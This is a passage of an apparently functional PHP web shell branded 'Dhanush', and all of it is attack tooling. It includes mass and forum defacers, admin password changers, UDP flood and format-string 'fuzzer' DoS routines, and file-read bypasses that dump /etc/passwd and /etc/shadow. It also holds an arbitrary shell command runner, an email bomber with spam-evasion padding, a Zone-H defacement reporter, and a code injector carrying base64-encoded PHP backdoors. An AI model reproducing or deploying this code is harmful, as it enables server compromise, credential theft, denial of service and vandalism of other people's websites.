4082 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4083 changeindexvb($conf,$_REQUEST['massdef']);
4084 $conf = @file_get_contents($url."dhanush/root/home/".$matches."/public_html/forum/configuration.php");
4085 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4086 changeindexvb($conf,$_REQUEST['massdef']);
4087 $conf = @file_get_contents($url."dhanush/root/home/".$matches."/public_html/core/configuration.php");
4088 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4089 changeindexvb($conf,$_REQUEST['massdef']);
4090 $conf = @file_get_contents($url."dhanush/root/home/".$matches."/public_html/vb/core/configuration.php");
4091 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4092 changeindexvb($conf,$_REQUEST['massdef']);
4093 changeindexvb($conf,$_REQUEST['massdef']);
4094 }
4095 fclose($file);
4096 }
4097 }
4098 }
4099 echo "</table><center>";
4100 }
4101 else
4102 echo "<center>Cannot do mass deface</center>";
4103}
4104else if(isset($_REQUEST["defaceforum"]))
4105{
4106 ?>
4107 <center><div id="showdeface"></div>
4108 <font size="4">Forum Index Changer</font>
4109 <form action="<?php echo $self; ?>" method = "POST">
4110 <input type="hidden" name="forum">
4111 <input type="hidden" name="defaceforum">
4112 <table class=btmtbl border = "1" width="60%" style="text-align: center;" align="center">
4113 <tr>
4114 <td height="50" width="50%"> Host : <input class="sbox" type="text" name="f1" size="20" value="localhost"></td>
4115
4116 <td width="50%"> Database : <input type ="text" class="sbox" name = "f2" size="20"></td></tr>
4117 <tr><td height="50" width="50%">User : <input type ="text" class="sbox" name = "f3" size="20"> </td>
4118 <td> Password : <input class="sbox" type ="text" name = "f4" size="20"></td></tr>
4119
4120 <tr><td height="50" width="50%">Type :
4121 <select class=sbox id="forumdeface" name="forumdeface" onChange="checkforum(this.value)">
4122 <option value="vb">vbulletin</option>
4123 <option value="mybb">Mybb</option>
4124 <option value="smf">SMF</option>
4125 <option value="ipb">IPB</option>
4126 <option value="wp">Wordpress</option>
4127 <option value="joomla">Joomla</option>
4128 </select></td>
4129 <td height="50" width="50%">Prefix : <input type="text" id="tableprefix" name="tableprefix" class="sbox"></td></td>
4130
4131 </tr>
4132 <tr>
4133 <td height="167" width="50%" colspan=2>
4134 <div style="display:none;" id="myjoomla"><p><b>Site URL : </b><input class="box" type="text" id="siteurl" name="siteurl" width="80" value="http://site.com/administrator/"></p></div>
4135
4136 <div style="display:none;" id="smfipb"><p align="center"><b>Head : </b><input class="sbox" type="text" name="head" size="20" value="Hacked"> <b>Kate ID : </b><input class="sbox" type="text" name="f5" size="20" value="1">
4137
4138 </div>
4139
4140 <p align="center"> <textarea class="box" name="index" cols=53 rows=8><b>lol ! You Are Hacked !!!!</b></textarea><p align="center">
4141 <input type="button" onClick="forumdefacefn(index.value,f1.value,f2.value,f3.value,f4.value,forumdeface.value,tableprefix.value,siteurl.value,head.value,f5.value)" class="but" value = "Hack It">
4142 </td>
4143 </tr>
4144 </table>
4145 </form>
4146 </center>
4147 <?php
4148 }
4149 else if(isset($_GET["passwordchange"]))
4150 {
4151 echo "<center>";
4152 ?>
4153 <div id="showchangepass"></div>
4154 <font size="4">Forum Password Changer</font>
4155 <form onSubmit="changeforumpassword('forumpass',f1.value,f2.value,f3.value,f4.value,forums.value,tableprefix.value,ipbuid.value,newipbpass.value,username.value,newjoomlapass.value,uname.value,newpass.value);return false;">
4156 <table class=btmtbl border = "1" width="60%" height="246" style="text-align: center;" align="center">
4157 <tr>
4158 <td height="50" width="50%"> Host : <input class="sbox" type="text" name="f1" size="20" value="localhost"></td><td height="50" width="50"> DataBase : <input type ="text" class="sbox" name = "f2" size="20"></td> <tr><td height="50" width="50%"> User : <input type ="text" class="sbox" name = "f3" size="20"></td><td height="50" width="50%"> Password : <input class="sbox" type ="text" name = "f4" size="20"></td></tr>
4159 <tr>
4160 <td height="50" width="50%">Type :
4161 <select class=sbox id="forums" name="forums" onChange="showMsg(this.value)">
4162 <option value="vb">vbulletin</option>
4163 <option value="mybb">Mybb</option>
4164 <option value="smf">SMF</option>
4165 <option value="ipb">IPB</option>
4166 <option value="phpbb">PHPBB</option>
4167 <option value="wp">Wordpress</option>
4168 <option value="joomla">Joomla</option>
4169 </select></td>
4170 <td height="50" width="50%">Prefix : <input type="text" id="tableprefix" name="tableprefix" class="sbox"></td>
4171 </tr>
4172 <tr>
4173 <td colspan=2 height="100" width="780">
4174
4175 <p align="center"><div id="fid" style="display:block;">User ID : <input class="sbox" type="text" name="ipbuid" size="20" value="1"> New Password : <input type ="text" class="sbox" name = "newipbpass" size="20" value="hacked"></div>
4176
4177 <div id="joomla" style="display:none;">New Username : <input style="width:170px;" class="box" type="text" name="username" size="20" value="admin"> New Password : <input type ="text" class="sbox" name = "newjoomlapass" size="20" value="hacked"></div>
4178
4179 <div id="wpress" style="display:none;"><p>New Username : <input style="width:170px;" class="box" type="text" name="uname" size="20" value="admin"> New Password : <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p></div>
4180
4181 <p><input type = "button" onClick="changeforumpassword('forumpass',f1.value,f2.value,f3.value,f4.value,forums.value,tableprefix.value,ipbuid.value,newipbpass.value,username.value,newjoomlapass.value,uname.value,newpass.value)" class="but" value = " Change IT " name="forumpass"></p></td>
4182 </tr>
4183 </table>
4184 </form>
4185 </center>
4186 <?php
4187}
4188else if(isset($_GET['dosser']))
4189{
4190 if(isset($_GET['ip']) && isset($_GET['exTime']) && isset($_GET['port']) && isset($_GET['timeout']) && isset($_GET['exTime']) && $_GET['exTime'] != "" &&
4191 $_GET['port'] != "" && $_GET['ip'] != "" && $_GET['timeout'] != "" && $_GET['exTime'] != "" )
4192 {
4193 $IP=$_GET['ip'];
4194 $port=$_GET['port'];
4195 $executionTime = $_GET['exTime'];
4196 $no0fBytes = $_GET['no0fBytes'];
4197 $data = "";
4198 $timeout = $_GET['timeout'];
4199 $packets = 0;
4200 $counter = $no0fBytes;
4201 $maxTime = time() + $executionTime;;
4202 while($counter--)
4203 {
4204 $data .= "X";
4205 }
4206 $data .= " Dhanush";
4207
4208 while(1)
4209 {
4210 $socket = fsockopen("udp://$IP", $port, $error, $errorString, $timeout);
4211 if($socket)
4212 {
4213 fwrite($socket , $data);
4214 fclose($socket);
4215 $packets++;
4216 }
4217 if(time() >= $maxTime)
4218 {
4219 break;
4220 }
4221 }
4222 echo "Dos Completed!<br>";
4223 echo "DOS attack against udp://$IP:$port completed on ".date("h:i:s A")."<br />";
4224 echo "Total Number of Packets Sent : " . $packets . "<br />";
4225 echo "Total Data Sent = ". HumanReadableFilesize($packets*$no0fBytes) . "<br />";
4226 echo "Data per packet = " . HumanReadableFilesize($no0fBytes) . "<br />";
4227 }
4228}
4229else if(isset($_GET['fuzzer']))
4230{
4231 if(isset($_GET['ip']) && isset($_GET['port']) && isset($_GET['timeout']) && isset($_GET['exTime']) && isset($_GET['no0fBytes']) && isset($_GET['multiplier']) && $_GET['no0fBytes'] != "" && $_GET['exTime'] != "" && $_GET['timeout'] != "" && $_GET['port'] != "" && $_GET['ip'] != "" && $_GET['multiplier'] != "")
4232 {
4233 $IP=$_GET['ip'];
4234 $port=$_GET['port'];
4235 $times = $_GET['exTime'];
4236 $timeout = $_GET['timeout'];
4237 $send = 0;
4238 $ending = "";
4239 $multiplier = $_GET['multiplier'];
4240 $data = "";
4241 $mode="tcp";
4242 $data .= "GET /";
4243 $ending .= " HTTP/1.1\n\r\n\r\n\r\n\r";
4244 if($_GET['type'] == "tcp")
4245 {
4246 $mode = "tcp";
4247 }
4248
4249 while($multiplier--)
4250
4251 {
4252 $data .= urlencode($_GET['no0fBytes']);
4253 }
4254 $data .= "%s%s%s%s%d%x%c%n%n%n%n";// add some format string specifiers
4255 $data .= "by-Dhanush".$ending;
4256 $length = strlen($data);
4257
4258
4259 echo "Sending Data :- <br /> <p align='center'>$data</p>";
4260
4261 for($i=0;$i<$times;$i++)
4262 {
4263 $socket = fsockopen("$mode://$IP", $port, $error, $errorString, $timeout);
4264 if($socket)
4265 {
4266 fwrite($socket , $data , $length );
4267 fclose($socket);
4268 }
4269 }
4270 echo "Fuzzing Completed!<br>";
4271 echo "DOS attack against $mode://$IP:$port completed on ".date("h:i:s A")."<br />";
4272 echo "Total Number of Packets Sent : " . $times . "<br />";
4273 echo "Total Data Sent = ". HumanReadableFilesize($times*$length) . "<br />";
4274 echo "Data per packet = " . HumanReadableFilesize($length) . "<br />";
4275 }
4276}
4277else if(isset($_GET['bypassit']))
4278{
4279 echo "<BR>";
4280 if(isset($_GET['copy']))
4281 {
4282 if(@copy($_GET['copy'],"test1.php"))
4283 {
4284 $fh=fopen("test1.php",'r');
4285 echo "<textarea cols=100 rows=20 class=box readonly>".htmlspecialchars(@fread($fh,filesize("test1.php")))."</textarea>";
4286 @fclose($fh);
4287 unlink("test1.php");
4288 }
4289 }
4290 else if(isset($_GET['filecontents']))
4291 {
4292 echo "<textarea cols=100 rows=20 class=box readonly>";
4293 echo file_get_contents($_GET['filecontents']);
4294 echo "</textarea>";
4295 }
4296 else if(isset($_GET['stream']))
4297 {
4298 echo "<textarea cols=100 rows=20 class=box readonly>";
4299 $file=$_GET['stream'];
4300 if ($stream = fopen($file, 'r')) {
4301 echo stream_get_contents($stream, -1, 0);
4302 fclose($stream);
4303 }
4304
4305 echo "</textarea>";
4306 }
4307 else if(isset($_GET['curl']))
4308 {
4309 $ch=curl_init("file://" . $_GET[curl]);
4310 curl_setopt($ch,CURLOPT_HEADERS,0);
4311 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
4312 $file_out=curl_exec($ch);
4313 curl_close($ch);
4314 echo "<textarea cols=100 rows=20 class=box readonly>".htmlspecialchars($file_out)."</textarea>";
4315 }
4316 else if(isset($_GET['include']))
4317 {
4318 if(file_exists($_GET['include']))
4319 {
4320 echo "<textarea cols=100 rows=20 class=box readonly>";
4321 @include($_GET['include']);
4322 echo "</textarea>";
4323 }
4324 else
4325 echo "<br><center><font size=3>Can't Read" . $_GET['include'] . "</font></center>";
4326 }
4327 else if(isset($_GET['id']))
4328 {
4329 echo "<textarea cols=100 rows=20 class=box readonly>";
4330 for($uid=0;$uid<60000;$uid++)
4331 {
4332 $ara = posix_getpwuid($uid);
4333 if (!empty($ara))
4334 {
4335 while (list ($key, $val) = each($ara))
4336 {
4337 print "$val:";
4338 }
4339 print "\n";
4340 }
4341 }
4342 echo "</textarea>";
4343 }
4344 else if(isset($_GET['tempnam']))
4345 {
4346 echo "<textarea cols=100 rows=20 class=box readonly>";
4347 $mytmp = tempnam ( 'tmp', $_GET['tempnam'] );
4348 $fp = fopen ( $mytmp, 'r' );
4349 while(!feof($fp))
4350 echo fgets($fp);
4351 fclose ( $fp );
4352 echo "</textarea>";
4353 }
4354 else if(isset($_GET['symlnk']))
4355 {
4356 echo "<textarea cols=100 rows=20 class=box readonly>";
4357 @mkdir("mydhanush",0777);
4358 @chdir("mydhanush");
4359 execmd("ln -s /etc/passwd");
4360
4361 echo file_get_contents($curr_url . "/mydhanush/passwd");
4362 echo "</textarea>";
4363 }
4364 if(isset($_GET['newtype']))
4365 {
4366 $filename = $_GET['newtype'];
4367 echo "<textarea cols=100 rows=20 class=box readonly>";
4368 if($_GET['optiontype'] == "xxd")
4369 echo execmd("xxd ".$filename);
4370 else if($_GET['optiontype'] == "rev")
4371 echo execmd("rev ".$filename);
4372 if($_GET['optiontype'] == "tac")
4373 echo execmd("tac ".$filename);
4374 if($_GET['optiontype'] == "more")
4375 echo execmd("more ".$filename);
4376 if($_GET['optiontype'] == "less")
4377 echo execmd("less ".$filename);
4378 if($_GET['optiontype'] == "awk")
4379 echo execmd("awk '{ print }' ".$filename);
4380 echo "</textarea>";
4381 }
4382 echo '<BR><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 2px;" /><BR><BR><BR>';
4383}
4384// Deface Website
4385else if(isset($_GET['deface']))
4386{
4387 $myfile = fopen($_GET['deface'],'w');
4388 if(fwrite($myfile, base64_decode($ind)))
4389 {fclose($myfile);
4390 echo "Index Defaced Successfully";}
4391 else
4392 echo "Donot have write permission";
4393}
4394else if(isset($_GET['perms']))
4395{
4396?><br>
4397 <form>
4398 <input type="hidden" name="myfilename" value="<?php echo $_GET['myfilepath']; ?>">
4399 <table align="center" border="1" style="width:40%;border-color:#333333;border-collapse:collapse;">
4400 <tr>
4401 <td style="height:40px" align="right">Change Permissions </td><td align="center"><input value="0755" name="chmode" class="sbox" /></td>
4402 </tr>
4403 <tr>
4404 <td colspan="2" align="center" style="height:60px">
4405 <input type="button" onClick="changeperms(chmode.value,myfilename.value)" value="Change Permission" class="but" style="padding: 5px;" />
4406 <input type="button" onClick="cancel()" value="cancel" class="but" style="padding: 5px;" />
4407 </td>
4408 </tr>
4409 </table>
4410
4411 </form>
4412 <?php
4413}
4414else if(isset($_GET["chmode"]))
4415{
4416 if($_GET['chmode'] != null && is_numeric($_GET['chmode']))
4417 {
4418 echo '<br>';
4419 $perms = 0;
4420 for($i=strlen($_GET['chmode'])-1;$i>=0;--$i)
4421 $perms += (int)$_GET['chmode'][$i]*pow(8, (strlen($_GET['chmode'])-$i-1));
4422 if(@chmod($_GET['myfilename'],$perms))
4423 echo "<center><blink><font class=txt>File Permissions Changed Successfully</font></blink></center>";
4424 else
4425 echo "<center><blink>Cannot Change File Permissions</blink></center>";
4426 echo '<BR><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 5px;" /><BR><BR>';
4427 }
4428}
4429else if(isset($_GET['rename']))
4430{
4431?><BR>
4432 <form>
4433 <table border="0" cellpadding="7" cellspacing="3">
4434 <tr>
4435 <td>File </td><td><input value="<?php echo $_GET['myfilepath'];?>" name="file" class="box" /></td>
4436 </tr>
4437 <tr>
4438 <td>To </td><td><input value="<?php echo $_GET['myfilepath'];?>" name="to" class="box" /></td>
4439 </tr>
4440 <tr>
4441 <td colspan="2"><input type="button" onClick="renamefun(file.value,to.value)" value="Rename It" class="but" style="margin-left: 160px;padding: 5px;"/>
4442 <input type="button" onClick="cancel()" value="cancel" class="but" style="padding: 5px;" />
4443 </td>
4444 </tr>
4445 </table>
4446 </form>
4447 <?php
4448
4449}
4450else if(isset($_GET['renamemyfile']))
4451{
4452 if(isset($_GET['to']) && isset($_GET['file']))
4453 {
4454 echo '<br>';
4455 if(!rename($_GET['file'], $_GET['to']))
4456 echo "Cannot Rename File";
4457 else
4458 echo "<font class=txt>File Renamed Successfully</font>";
4459 echo '<br><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 5px;" /><BR><BR>';
4460 }
4461}
4462else if(isset($_GET['open']))
4463{
4464 if(is_file($_GET['myfilepath']))
4465 {
4466 $owner = "0/0";
4467 if($os == "Linux")
4468 $owner = getOGid($_GET['myfilepath']);
4469 ?>
4470 <form>
4471 <table style="width:57%;">
4472 <tr align="left">
4473 <td align="left">File : </td><td><font class=txt><?php echo $_GET['myfilepath'];?></font></td><td align="left">Permissions : </td><td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo addslashes($_GET['myfilepath']); ?>')"><?php echo filepermscolor($_GET['myfilepath']);?></a></td>
4474 </tr>
4475 <tr>
4476 <td>Size : </td><td><?php echo HumanReadableFileSize(filesize($_GET['myfilepath']));?></td><td>Owner/Group : </td><td><font class=txt><?php echo $owner;?></font></td>
4477 </tr>
4478 </table>
4479 <textarea name="content" rows="15" cols="100" class="box"><?php
4480 $content = htmlspecialchars(file_get_contents($_GET['myfilepath']));
4481 if($content)
4482 {
4483 echo $content;
4484 }
4485 else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof'))
4486 {
4487 if(filesize($_GET['myfilepath']) != 0 )
4488 {
4489 fopen($_GET['myfilepath']);
4490 while(!feof())
4491 {
4492 echo htmlspecialchars(fgets($_GET['myfilepath']));
4493 }
4494 }
4495 }
4496
4497 ?>
4498 </textarea><br />
4499 <input name="save" type="button" onClick="savemyfile('<?php echo addslashes($_GET['myfilepath']); ?>',content.value)" value="Save Changes" id="spacing" class="but"/>
4500 <input name="save" type="button" onClick="cancel()" value="Cancel" id="spacing" class="but"/>
4501 </form>
4502 <?php
4503 }
4504 else
4505 echo '<BR><input name="save" type="button" onClick="cancel()" value=" OK " id="spacing" class="but"/><BR>File does not exist !!!!<BR>';
4506}
4507else if(isset($_POST['file']) && isset($_POST['content']))
4508{
4509 echo '<BR>';
4510 if(file_exists($_POST['file']))
4511 {
4512 $handle = fopen($_POST['file'],"w");
4513 if(fwrite($handle,$_POST['content']))
4514 echo "<font class=txt>File Saved Successfully!</font>";
4515 else
4516 echo "Cannot Write into File";
4517 }
4518 else
4519 {
4520 echo "File Name Specified does not exists!";
4521 }
4522 echo '<BR><input type="button" onClick="cancel()" value=" OK " class="but" /><BR><BR>';
4523}
4524else if(isset($_POST["SendNowToZoneH"]))
4525{
4526 $hacker = $_POST['defacer'];
4527 $method = $_POST['hackmode'];
4528 $neden = $_POST['reason'];
4529 $site = $_POST['domain'];
4530
4531 if (empty($hacker))
4532 {
4533 die("<center><font size=3>[-] You Must Fill the Attacker name !</font></center>");
4534 }
4535 elseif($method == "--------SELECT--------")
4536 {
4537 die("<center><font size=3>[-] You Must Select The Method !</center>");
4538 }
4539 elseif($neden == "--------SELECT--------")
4540 {
4541 die("<center><font size=3>[-] You Must Select The Reason</center>");
4542 }
4543 elseif(empty($site))
4544 {
4545 die("<center><font size=3>[-] You Must Inter the Sites List !</center>");
4546 }
4547 // Zone-h Poster
4548 function ZoneH($url, $hacker, $hackmode,$reson, $site )
4549 {
4550 $k = curl_init();
4551 curl_setopt($k, CURLOPT_URL, $url);
4552 curl_setopt($k,CURLOPT_POST,true);
4553 curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
4554 curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
4555 curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
4556 $kubra = curl_exec($k);
4557 curl_close($k);
4558 return $kubra;
4559 }
4560
4561 $i = 0;
4562 $sites = explode("\n", $site);
4563 echo "<pre class=ml1 style='margin-top:5px'>";
4564 while($i < count($sites))
4565 {
4566 if(substr($sites[$i], 0, 4) != "http")
4567 {
4568 $sites[$i] = "http://".$sites[$i];
4569 }
4570 ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
4571 echo "<font class=txt size=3>Site : ".$sites[$i]." Posted !</font><br>";
4572 ++$i;
4573 }
4574
4575 echo "<font class=txt size=4>Sending Sites To Zone-H Has Been Completed Successfully !! </font></pre>";
4576}
4577else if(isset($_GET['executemycmd']))
4578{
4579 $comm = $_GET['executemycmd'];
4580 chdir($_GET['executepath']);
4581 echo shell_exec($comm);
4582}
4583// View Passwd file
4584else if(isset($_GET['passwd']))
4585{
4586 $test='';
4587 $tempp= tempnam($test, "cx");
4588 $get = "/etc/passwd";
4589 $name=@posix_getpwuid(@fileowner($get));
4590 $group=@posix_getgrgid(@filegroup($get));
4591 $owner = $name['name']. " / ". $group['name'];
4592 ?>
4593 <table style="width:57%;">
4594 <tr>
4595 <td align="left">File : </td><td><font class=txt><?php echo $get; ?></font></td><td align="left">Permissions : </td><td><?php echo filepermscolor($get);?></td>
4596 </tr>
4597 <tr>
4598 <td>Size : </td><td><?php echo filesize($get);?></td><td>Owner/Group : </td><td><font class=txt><?php echo $owner;?></font></td>
4599 </tr>
4600 </table>
4601 <?php
4602 if(copy("compress.zlib://".$get, $tempp))
4603 {
4604 $fopenzo = fopen($tempp, "r");
4605 $freadz = fread($fopenzo, filesize($tempp));
4606 fclose($fopenzo);
4607 $source = htmlspecialchars($freadz);
4608 echo "<tr><td><center><textarea rows='20' cols='80' class=box name='source'>$source</textarea><br>";
4609 unlink($tempp);
4610 }
4611 else
4612 {
4613 ?>
4614 <form>
4615 <input type="hidden" name="etcpasswd">
4616 <table class="tbl" border="1" cellpadding="5" cellspacing="5" align="center" style="width:40%;">
4617 <tr>
4618 <td>From : </td><td><input type="text" name="val1" class="sbox" value="1"></td>
4619 </tr>
4620 <tr>
4621 <td>To : </td><td><input type="text" name="val2" class="sbox" value="1000"></td>
4622 </tr>
4623 <tr>
4624 <td colspan="2" align="center"><input type="submit" value=" Go " class="but"></td>
4625 </tr>
4626 </table><br>
4627 </form>
4628 <?php
4629 }
4630 ?>
4631 <br />
4632 <input type="button" onClick="cancel()" value=" OK " class="but" /><BR><BR>
4633 <?php
4634}
4635else if(isset($_GET['shadow']))
4636{
4637 $test='';
4638 $tempp= tempnam($test, "cx");
4639 $get = "/etc/shadow";
4640 if(copy("compress.zlib://".$get, $tempp))
4641 {
4642 $fopenzo = fopen($tempp, "r");
4643 $freadz = fread($fopenzo, filesize($tempp));
4644 fclose($fopenzo);
4645 $source = htmlspecialchars($freadz);
4646 echo "<tr><td><center><font size='3' face='Verdana'>$get</font><br><textarea rows='20' cols='80' class=box name='source'>$source</textarea>";
4647 unlink($tempp);
4648 }
4649}
4650else if(isset($_GET['bomb']))
4651{
4652 ?><div id="showmail"></div>
4653 <form>
4654 <table id="margins" style="width:100%;">
4655 <tr>
4656 <td style="width:30%;">To</td>
4657 <td>
4658 <input class="box" name="to" value="victim@domain.com,victim2@domain.com" onFocus="if(this.value == 'victim@domain.com,victim2@domain.com')this.value = '';" onBlur="if(this.value=='')this.value='victim@domain.com,victim2@domain.com';"/>
4659 </td>
4660 </tr>
4661 <tr>
4662
4663 <td style="width:30%;">Subject</td>
4664 <td>
4665 <input type="text" class="box" name="subject" value="Dhanush Here!" onFocus="if(this.value == 'Dhanush Here!')this.value = '';" onBlur="if(this.value=='')this.value='Dhanush Here!';" />
4666 </td>
4667 </tr>
4668 <tr>
4669 <td style="width:30%;">No. of Times</td>
4670 <td>
4671 <input class="box" name="times" value="100" onFocus="if(this.value == '100')this.value = '';" onBlur="if(this.value=='')this.value='100';"/>
4672 </td>
4673 </tr>
4674 <tr>
4675 <td style="width:30%;">Pad your message (Less spam detection)</td>
4676 <td><input type="checkbox" name="padding"/></td>
4677 </tr>
4678 <tr>
4679 <td colspan="2"><textarea name="message" cols="110" rows="10" class="box">Hello !! This is Dhanush!!</textarea></td>
4680 </tr>
4681 <tr>
4682 <td rowspan="2">
4683 <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="sendmail('dobombing',to.value,subject.value,message.value,'null',times.value,padding.value)" class="but" value=" Bomb! "/>
4684 </td>
4685 </tr>
4686 </table>
4687 </form>
4688 <?php
4689}
4690
4691//Mass Mailer
4692else if(isset($_GET['mail']))
4693{
4694 ?><div id="showmail"></div>
4695 <div align="left">
4696 <form>
4697 <table align="left" style="width:100%;">
4698 <tr>
4699 <td style="width:10%;">From</td>
4700 <td style="width:80%;" align="left"><input name="from" class="box" value="Hello@abcd.in" onFocus="if(this.value == 'Hello@abcd.in')this.value = '';" onBlur="if(this.value=='')this.value='Hello@abcd.in';"/></td>
4701 </tr>
4702
4703 <tr>
4704 <td style="width:20%;">To</td>
4705 <td style="width:80%;"><input class="box" class="box" name="to" value="victim@domain.com,victim2@domain.com" onFocus="if(this.value == 'victim@domain.com,victim2@domain.com')this.value = '';" onBlur="if(this.value=='')this.value='victim@domain.com,victim2@domain.com';"/></td>
4706 </tr>
4707
4708 <tr>
4709 <td style="width:20%;">Subject</td>
4710 <td style="width:80%;"><input type="text" class="box" name="subject" value="Dhanush Here!!" onFocus="if(this.value == 'Dhanush Here!!')this.value = '';" onBlur="if(this.value=='')this.value='Dhanush Here!!';" /></td>
4711 </tr>
4712
4713
4714 <tr>
4715 <td colspan="2">
4716 <textarea name="message" cols="110" rows="10" class="box">Hello !! This is Dhanush!!! Patch your site.....</textarea>
4717 </td>
4718 </tr>
4719
4720
4721 <tr>
4722 <td rowspan="2">
4723 <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="sendmail('massmailing',to.value,subject.value,message.value,from.value)" class="but" value=" Send! "/>
4724 </td>
4725 </tr>
4726 </table>
4727 </form></div>
4728 <?php
4729}
4730// Get Domains
4731else if(isset($_REQUEST["symlinkserver"]))
4732{
4733 ?>
4734 <center><table><tr>
4735 <td><a href=javascript:void(0) onClick="getdata('perlsymlink')"><font class=txt><b>| Perl Symlink |</b></font></a></td>
4736 <td><a href=javascript:void(0) onClick="getdata('symlink')"><font class=txt><b>| Symlink Server |</b></font></a></td>
4737 <td><a href=javascript:void(0) onClick="getdata('symlinkfile')"><font class=txt><b>| Symlink File |</b></font></a></td>
4738 <td><a href=javascript:void(0) onClick="getdata('script')"><font class=txt><b>| Script Locator |</b></font></a></td>
4739 </tr></table></center><br>
4740 <div id="showdata"></div><?php
4741}
4742// Forum Manager
4743else if(isset($_REQUEST["forum"]))
4744{ ?>
4745 <center><table><tr><td><a href=# onClick="getdata('defaceforum')"><font class=txt size="4">| Forum Defacer |</font></a></td>
4746 <td><a href=# onClick="getdata('passwordchange')"><font class=txt size="4">| Forum Password Changer |</font></a></td>
4747 <td><a href=# onClick="getdata('massdeface')"><font class=txt size="4">| Mass Defacer |</font></a></td>
4748 </tr></table></center><br><div id="showdata"></div>
4749 <?php
4750}
4751// Sec info
4752else if(isset($_GET['secinfo']))
4753{ ?><div id=showdata></div>
4754<center><div id="showmydata"></div>
4755</center>
4756<br><center><font size=5>Server security information</font><br><br></center>
4757 <table class="btmtbl" style="width:100%;" border="1">
4758 <tr>
4759 <td style="width:7%;">Curl</td>
4760 <td style="width:7%;">Oracle</td>
4761 <td style="width:7%;">MySQL</td>
4762 <td style="width:7%;">MSSQL</td>
4763 <td style="width:7%;">PostgreSQL</td>
4764 <td style="width:12%;">Open Base Directory</td>
4765 <td style="width:10%;">Safe_Exec_Dir</td>
4766 <td style="width:7%;">PHP Version</td>
4767 <td style="width:7%;">Magic Quotes</td>
4768 <td style="width:7%;">Server Admin</td>
4769 </tr>
4770 <tr>
4771 <td style="width:7%;"><font class="txt"><?php curlinfo(); ?></font></td>
4772 <td style="width:7%;"><font class="txt"><?php oracleinfo(); ?></font></td>
4773 <td style="width:7%;"><font class="txt"><?php mysqlinfo(); ?></font></td>
4774 <td style="width:7%;"><font class="txt"><?php mssqlinfo(); ?></font></td>
4775 <td style="width:7%;"><font class="txt"><?php postgresqlinfo(); ?></font></td>
4776 <td style="width:12%;"><font class="txt"><?php echo $basedir; ?></font></td>
4777 <td style="width:10%;"><font class="txt"><?php if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_exec_dir'))) {echo "<font >NONE</font></b>";}else {echo "<font class='txt'>$df</font></b>";};} ?></font></td>
4778 <td style="width:7%;"><font class="txt"><?php phpver(); ?></font></td>
4779 <td style="width:7%;"><font class="txt"><?php magic_quote(); ?></font></td>
4780 <td style="width:7%;"><font class="txt"><?php serveradmin(); ?></font></td>
4781 </tr>
4782</table><br> <?php
4783 mysecinfo();
4784}
4785// Code Injector
4786
4787else if(isset($_GET['injector']))
4788{
4789 if($os != "Windows")
4790 $injectcode = "PD9waHAgJGNtZCA9IDw8PEVPRA0KY21kDQpFT0Q7DQoNCmlmKGlzc2V0KCRfUkVRVUVTVFskY21kXSkpIHsNCnN5c3RlbSgkX1JFUVVFU1RbJGNtZF0pOyB9ID8+";
4791 else
4792 {
4793 $injectcode = "PD9waHAgJHBhc3N3cmQgPSA8PDxFT0QKNjJhYTZhOWE1ZGEwMDAxNDI4MGZlODU2YzI3MzhiMDYKRU9EOwokZGhwYXNzd2QgPSA8PDxFT0QKZGhwYXNzd2QKRU9EOwokdXBsb2FkZWQgPSA8PDxFT0QKdXBsb2FkZWQKRU9EOwokbmFtZSA9IDw8PEVPRApuYW1lCkVPRDsKJHRtcF9uYW1lID0gPDw8RU9ECnRtcF9uYW1lCkVPRDsKaWYgKGlzc2V0ICgkX0dFVFskZGhwYXNzd2RdKSBhbmQgbWQ1KCRfR0VUWyRkaHBhc3N3ZF0pPT0kcGFzc3dyZCkKez8+PGZvcm0gZW5jdHlwZT1tdWx0aXBhcnQvZm9ybS1kYXRhIG1ldGhvZD1QT1NUIGFjdGlvbj0+dXBsb2FkOiA8aW5wdXQgbmFtZT11cGxvYWRlZCB0eXBlPWZpbGUgLz48aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9VXBsb2FkIC8+PC9mb3JtPgo8P3BocCAKaWYoaXNzZXQoJF9GSUxFU1skdXBsb2FkZWRdWyRuYW1lXSkpCnsKJHVwbG9hZGVkID0gPDw8RU9ECnVwbG9hZGVkCkVPRDsKJHRhcmdldF9wYXRoID0gPDw8RU9ECi4vCkVPRDsKJHRhcmdldF9wYXRoID0gJHRhcmdldF9wYXRoIC4gYmFzZW5hbWUoICRfRklMRVNbJHVwbG9hZGVkXVskbmFtZV0pOwppZihtb3ZlX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1skdXBsb2FkZWRdWyR0bXBfbmFtZV0sICR0YXJnZXRfcGF0aCkpIHtlY2hvICR1cGxvYWRlZDt9fX0KPz4=";
4794 }
4795 ?>
4796 <form method='POST'>
4797 <table id="margins">
4798 <tr>
4799 <td width="100" class="title">
4800 Directory
4801 </td>
4802 <td>
4803 <input class="box" name="pathtomass" value="<?php echo getcwd().$SEPARATOR; ?>" />
4804 </td>
4805
4806 </tr>
4807 <tr>
4808 <td class="title">
4809 Mode
4810 </td>
4811 <td>
4812 <select style="width: 400px;" name="mode" class="box">
4813 <option value="Apender">Apender</option>
4814 <option value="Overwriter">Overwriter</option>
4815 </select>
4816 </td>
4817 </tr>
4818 <tr>
4819 <td class="title">
4820 File Type
4821 </td>
4822 <td>
4823 <input type="text" class="box" name="filetype" value="php" onBlur="if(this.value=='')this.value='php';" />
4824 </td>
4825 </tr>
4826 <tr>
